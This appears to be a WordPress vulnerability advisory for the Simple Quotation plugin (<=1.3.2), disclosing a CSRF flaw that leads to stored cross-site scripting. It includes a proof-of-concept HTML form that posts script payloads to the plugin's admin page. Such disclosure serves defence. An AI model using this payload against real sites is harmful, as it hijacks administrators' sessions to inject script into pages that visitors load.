WordPress Plugin Vulnerabilities
Simple Quotation <= 1.3.2 - Quote Creation/Edition via CSRF to Stored Cross-Site Scripting
Description
The plugin does not have CSRF check when creating or editing a quote and does not sanitise and escape Quotes. As a result, attacker could make a logged in admin create or edit arbitrary quote, and put Cross-Site Scripting payloads in them
Proof of Concept
<html> <body> <form action="https://example.com/wp-admin/admin.php?page=simple-quotation/simple-quotation.php" method="POST"> <input type="hidden" name="author" value="<script>alert(/XSS-image/)</script>" /> <input type="hidden" name="newquotes" value="<script>alert(/XSS-quote/)</script>" /> <input type="hidden" name="add" value="Add the quote" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Abhishek Bhoir
Submitter
Abhishek Bhoir
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-16 (about 2 years ago)
Added
2022-02-16 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)